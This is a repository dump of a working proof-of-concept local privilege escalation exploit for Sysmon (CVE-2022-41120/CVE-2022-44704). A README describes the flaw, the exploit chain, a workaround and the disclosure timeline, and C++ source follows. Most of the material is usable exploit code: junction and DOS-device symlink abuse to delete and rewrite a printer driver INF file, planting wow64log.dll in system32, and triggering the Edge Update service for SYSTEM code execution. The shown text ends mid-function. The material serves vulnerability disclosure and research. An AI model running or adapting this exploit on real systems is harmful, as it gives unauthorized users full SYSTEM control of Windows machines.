[
  {
    "path": "README.md",
    "content": "# SysmonEoP\n\nProof of Concept for arbitrary file delete/write in Sysmon (CVE-2022-41120/CVE-2022-44704)\n\n# Vulnerability\n\nThe vulnerability is in the code responsible for the ClipboardChange event, which can be reached through RPC.\nLocal users can send data to the RPC server, which is then written to the C:\\Sysmon directory (the default ArchiveDirectory) and deleted afterwards.\nIn versions before 14.11 Sysmon did not check whether the directory was created by a low-privilege user or whether it is a junction, which can be abused to perform arbitrary file delete/write (somewhat limited, as you can only write strings) in the context of the NT AUTHORITY\\SYSTEM user.\nIn versions 14.11/14.12, after the initial fix, Sysmon checks whether the directory exists and refuses to write/delete files if it does.\nThis patch was bypassed by letting Sysmon create the C:\\Sysmon directory first (using the CreateDirectory API) and opening a handle on it before SetFileSecurity is called to change the DACL on the C:\\Sysmon directory.\n\n# Exploitation\n\nAll testing was done on Windows 10.\n\nIn my PoC I chained the arbitrary file delete/write to first delete the setup information file of a printer driver and then write a modified .INF file (the spooler service is enabled by default and low-privilege users can re-install printer drivers on Windows clients).\nSetup information files can be abused to perform all kinds of operations such as service creation, registry modification, file copy, etc.\nI chose to copy some of the printer's default DLLs into c:\\windows\\system32 and set permissions on them so that low-privilege users can modify them; this is done using the CopyFiles directive (https://learn.microsoft.com/en-us/windows-hardware/drivers/install/inf-copyfiles-directive). Once the file is copied it is overwritten with a DLL that spawns an elevated cmd.exe process.\nIt is possible to abuse just an arbitrary file delete for LPE by abusing Windows Installer behavior (trick found by [@KLINIX5](https://twitter.com/KLINIX5) and documented by ZDI here: https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks).\n\n# Vulnerable versions and prerequisites\n\nAll testing was done on versions 13.34-14.12.\nI don’t know exactly which is the lowest vulnerable version, but I believe that versions 12.0 - 14.12 are vulnerable, as the ClipboardChange event was introduced in version 12.0.\nIn order to exploit this vulnerability, events that use the ArchiveDirectory (ClipboardChange and FileDelete, I believe) must not be enabled, because if those two are used the ArchiveDirectory will be created with secure permissions.\n\n# Workaround\n\nIf you are using a vulnerable version and cannot update, you can create the ArchiveDirectory (C:\\Sysmon by default) and set permissions that only allow access to the NT AUTHORITY\\SYSTEM account.\n\n# Timeline\n\n- 2022/06/13 - Vulnerability reported to Microsoft.\n- 2022/06/16 - Vulnerability confirmed.\n- 2022/11/08 - Patch and CVE released.\n- 2022/11/08 - Bypass reported to Microsoft.\n- 2022/11/11 - Microsoft cannot reproduce the vulnerability, asks for a different PoC.\n- 2022/11/11 - I send the same PoC and suggest that Sysmon is either not installed on the testing VM or the installation was corrupted.\n- 2022/11/15 - Microsoft confirmed the bypass.\n- 2022/11/28 - Microsoft released v14.13, which patched the vulnerability (CVE will be released in the December Patch Tuesday).\n\n# Links & Resources\n- https://itm4n.github.io/fuzzing-windows-rpc-rpcview/\n- https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks\n"
  },
  {
    "path": "v1/README.md",
    "content": "Exploit for versions before 14.11.\n\n![PoC](poc.PNG)\n"
  },
  {
    "path": "v1/SysmonEoP/SysmonEOP.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.30717.126\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"SysmonEOP\", \"SysmonEOP.vcxproj\", \"{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.Build.0 = Release|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {EA809E7C-ABAC-45B5-BE5B-2F48BFC601DA}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "v1/SysmonEoP/SysmonEOP.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{fac6a4f5-2e86-4ef0-a787-669b2a2f28af}</ProjectGuid>\r\n    <RootNamespace>SysmonEOP</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" 
Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      
<EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\r\n      <ProgramDataBaseFileName />\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n    <BuildLog>\r\n      <Path />\r\n    </BuildLog>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\" />\r\n    <ClCompile Include=\"sysmon_c.c\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Midl Include=\"sysmon.idl\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"def.h\" />\r\n    <ClInclude Include=\"resource.h\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile 
Include=\"resource.rc\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "v1/SysmonEoP/SysmonEOP.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n    <ClCompile Include=\"sysmon_c.c\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Midl Include=\"sysmon.idl\">\r\n      <Filter>Source Files</Filter>\r\n    </Midl>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"def.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"resource.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile Include=\"resource.rc\">\r\n      <Filter>Resource Files</Filter>\r\n    </ResourceCompile>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "v1/SysmonEoP/SysmonEOP.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "v1/SysmonEoP/def.h",
    "content": "#include <Windows.h>\r\n#include <winternl.h>\r\n#include <combaseapi.h>\r\n#include <comdef.h>\r\n#include <stdio.h>\r\n#include <Wbemidl.h>\r\n#include \"sysmon_h.h\"\r\n#include \"resource.h\"\r\n\r\n\r\n#pragma comment(lib, \"wbemuuid.lib\")\r\n#pragma comment(lib,\"RpcRT4.lib\")\r\n#pragma warning(disable:4996)\r\n\r\nstruct __declspec(uuid(\"A6B716CB-028B-404D-B72C-50E153DD68DA\")) CLSID_MSEdge_Object;\r\nclass __declspec(uuid(\"79e0c401-b7bc-4de5-8104-71350f3a9b67\")) IGoogleUpdate : IUnknown {\r\npublic:\r\n\r\n\r\n    HRESULT CheckForUpdate(const WCHAR* guid, VOID* observer);\r\n    HRESULT Update(const WCHAR* guid, VOID* observer);\r\n\r\n};\r\n\r\n//Variables\r\nwchar_t object[] = L\"Global\\\\GLOBALROOT\\\\RPC Control\\\\CLIP-876BEE15B64B610D2505A44596ED92FBA9624DB923F9D608698BD8C8E64E4F1A\";\r\nwchar_t sysmon[] = L\"C:\\\\SYSMON\";\r\nHANDLE hFile, hFile2,hSysmon;\r\n\r\n//Functions*\r\nLPWSTR Find();\r\nvoid load();\r\nBOOL AddPrinterDriverWmi();\r\nvoid Trigger(LPWSTR alpc);\r\nLPWSTR  BuildPath(LPCWSTR path);\r\nBOOL CreateJunction(HANDLE dir, LPCWSTR target);\r\nBOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target);\r\nBOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target);\r\nBOOL DeleteJunction(HANDLE dir);\r\n\r\n\r\ntypedef struct _REPARSE_DATA_BUFFER {\r\n    ULONG  ReparseTag;\r\n    USHORT ReparseDataLength;\r\n    USHORT Reserved;\r\n    union {\r\n        struct {\r\n            USHORT SubstituteNameOffset;\r\n            USHORT SubstituteNameLength;\r\n            USHORT PrintNameOffset;\r\n            USHORT PrintNameLength;\r\n            ULONG  Flags;\r\n            WCHAR  PathBuffer[1];\r\n        } SymbolicLinkReparseBuffer;\r\n        struct {\r\n            USHORT SubstituteNameOffset;\r\n            USHORT SubstituteNameLength;\r\n            USHORT PrintNameOffset;\r\n            USHORT PrintNameLength;\r\n            WCHAR  PathBuffer[1];\r\n        } MountPointReparseBuffer;\r\n        struct {\r\n            
UCHAR DataBuffer[1];\r\n        } GenericReparseBuffer;\r\n    } DUMMYUNIONNAME;\r\n} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;\r\ntypedef struct _OBJECT_DIRECTORY_INFORMATION {\r\n    UNICODE_STRING Name;\r\n    UNICODE_STRING TypeName;\r\n} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;\r\n#define STATUS_MORE_ENTRIES 0x00000105\r\n#define STATUS_NO_MORE_ENTRIES 0x8000001A\r\n#define IO_REPARSE_TAG_MOUNT_POINT              (0xA0000003L)\r\n\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK   IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);\r\ntypedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_      HANDLE  DirectoryHandle, _Out_opt_ PVOID   Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_  BOOLEAN RestartScan, _Inout_   PULONG  Context, _Out_opt_ PULONG  ReturnLength);\r\ntypedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE  FileHandle,PIO_STATUS_BLOCK  IoStatusBlock,PVOID  FileInformation,ULONG  Length,ULONG FileInformationClass);\r\n\r\n_RtlInitUnicodeString pRtlInitUnicodeString;\r\n_NtCreateFile pNtCreateFile;\r\n_NtSetInformationFile pNtSetInformationFile;\r\n_NtQueryDirectoryObject pNtQueryDirectoryObject;\r\n_NtOpenDirectoryObject pNtOpenDirectoryObect;"
  },
  {
    "path": "v1/SysmonEoP/main.cpp",
    "content": "#include \"def.h\"\r\n\r\n\r\nint wmain(int argc, wchar_t* argv[])\r\n{\r\n    load();\r\n    LPWSTR alpc = Find();\r\n    HANDLE h1;\r\n    if (alpc == NULL) {\r\n        printf(\"[!] Failed to find ALPC port!\\n\");\r\n        return 1;\r\n    }\r\n\r\n    if (!CreateDirectory(sysmon, NULL)) {\r\n        printf(\"[!] Failed to create %ls directory!\\n\",sysmon);\r\n        return 1;\r\n    }\r\n    hSysmon = CreateFile(sysmon, FILE_WRITE_ATTRIBUTES | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_ALWAYS, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT|FILE_FLAG_DELETE_ON_CLOSE, NULL);\r\n    if (hSysmon == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] Failed to open handle on %ls directory!\\n\", sysmon);\r\n        return 1;\r\n    }\r\n    DosDeviceSymLink(object, BuildPath(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\"));\r\n    CreateJunction(hSysmon, L\"\\\\RPC Control\");\r\n   \r\n    Trigger(alpc);\r\n   \r\n    do {\r\n        h1 = CreateFile(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\", GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (h1 != INVALID_HANDLE_VALUE);\r\n    Sleep(500);\r\n   \r\n    printf(\"[+] Driver setup info file deleted!\\n\");\r\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Trigger, alpc, 0, NULL);\r\n    do {\r\n        h1 = CreateFile(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (h1 == INVALID_HANDLE_VALUE);\r\n    HMODULE hm = GetModuleHandle(NULL);\r\n    HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L\"dll\");\r\n    DWORD DllSize = SizeofResource(hm, res);\r\n    void* DllBuff = 
LoadResource(hm, res);\r\n    printf(\"[+] Driver setup info file written.\\n\");\r\n    if (!AddPrinterDriverWmi()) {\r\n        printf(\"[!] Failed to add print driver!\\n\");\r\n        return 1;\r\n    }\r\n   \r\n    HANDLE dll;\r\n    do {\r\n        Sleep(1000);\r\n        dll = CreateFile(L\"C:\\\\windows\\\\system32\\\\wow64log.dll\", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (dll == INVALID_HANDLE_VALUE);\r\n    printf(\"[+] DLL created!\\n\");\r\n    WriteFile(dll, DllBuff, DllSize, NULL, NULL);\r\n    CloseHandle(dll);\r\n    printf(\"[*] Triggering Edge Update service!\\n\");\r\n    HRESULT coini = CoInitialize(NULL);\r\n    IGoogleUpdate* updater = NULL;\r\n\r\n    HRESULT hr = CoCreateInstance(__uuidof(CLSID_MSEdge_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(updater), (PVOID*)&updater);\r\n    \r\n   \r\n    DelDosDeviceSymLink(object, BuildPath(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\"));\r\n    DeleteJunction(hSysmon);\r\n    while(!DeleteFile(L\"C:\\\\windows\\\\system32\\\\wow64log.dll\")){}\r\n    return 0;\r\n}\r\n\r\n\r\n\r\nvoid load() {\r\n    HMODULE ntdll = LoadLibraryW(L\"ntdll.dll\");\r\n    if (ntdll != NULL) {\r\n        pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, \"RtlInitUnicodeString\");\r\n        pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, \"NtCreateFile\");\r\n        pNtQueryDirectoryObject = (_NtQueryDirectoryObject)GetProcAddress(ntdll, \"NtQueryDirectoryObject\");\r\n        pNtOpenDirectoryObect = (_NtOpenDirectoryObject)GetProcAddress(ntdll, \"NtOpenDirectoryObject\");\r\n        pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll, \"NtSetInformationFile\");\r\n    }\r\n    if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL || pNtQueryDirectoryObject == NULL || pNtOpenDirectoryObect == NULL|| pNtSetInformationFile == 
NULL) {\r\n        printf(\"Cannot load api's %d\\n\", GetLastError());\r\n        exit(0);\r\n    }\r\n\r\n}\r\n\r\n\r\n\r\nBOOL CreateJunction(HANDLE hDir, LPCWSTR target) {\r\n    HANDLE hJunction;\r\n    DWORD cb;\r\n    wchar_t printname[] = L\"\";\r\n    if (hDir == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] HANDLE invalid!\\n\");\r\n        return FALSE;\r\n    }\r\n    SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);\r\n    SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);\r\n    SIZE_T PathLen = TargetLen + PrintnameLen + 12;\r\n    SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer));\r\n    PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);\r\n    Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\r\n    Data->ReparseDataLength = PathLen;\r\n    Data->Reserved = 0;\r\n    Data->MountPointReparseBuffer.SubstituteNameOffset = 0;\r\n    Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;\r\n    memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);\r\n    Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);\r\n    Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;\r\n    memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1, printname, PrintnameLen + 2);\r\n    WCHAR dir[MAX_PATH] = { 0x0 };\r\n    if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL, 0, &cb, NULL) != 0)\r\n    {\r\n\r\n        GetFinalPathNameByHandle(hDir, dir, MAX_PATH, 0);\r\n        printf(\"[+] Junction %ls -> %ls created!\\n\", dir, target);\r\n        free(Data);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n\r\n        printf(\"[!] Error: %d. 
Exiting\\n\", GetLastError());\r\n        free(Data);\r\n        return FALSE;\r\n    }\r\n}\r\nBOOL DeleteJunction(HANDLE handle) {\r\n    REPARSE_GUID_DATA_BUFFER buffer = { 0 };\r\n    BOOL ret;\r\n    buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\r\n    DWORD cb = 0;\r\n    IO_STATUS_BLOCK io;\r\n    if (handle == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] HANDLE invalid!\\n\");\r\n        return FALSE;\r\n    }\r\n    WCHAR dir[MAX_PATH] = { 0x0 };\r\n    if (DeviceIoControl(handle, FSCTL_DELETE_REPARSE_POINT, &buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL)) {\r\n        GetFinalPathNameByHandle(handle, dir, MAX_PATH, 0);\r\n        printf(\"[+] Junction %ls deleted!\\n\", dir);\r\n        return TRUE;\r\n    }\r\n    else\r\n    {\r\n        printf(\"[!] Error: %d.\\n\", GetLastError());\r\n        return FALSE;\r\n    }\r\n}\r\n\r\nBOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {\r\n    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object, target)) {\r\n        printf(\"[+] Symlink %ls -> %ls created!\\n\", object, target);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n        printf(\"error :%d\\n\", GetLastError());\r\n        return FALSE;\r\n\r\n    }\r\n}\r\n\r\nBOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {\r\n    if 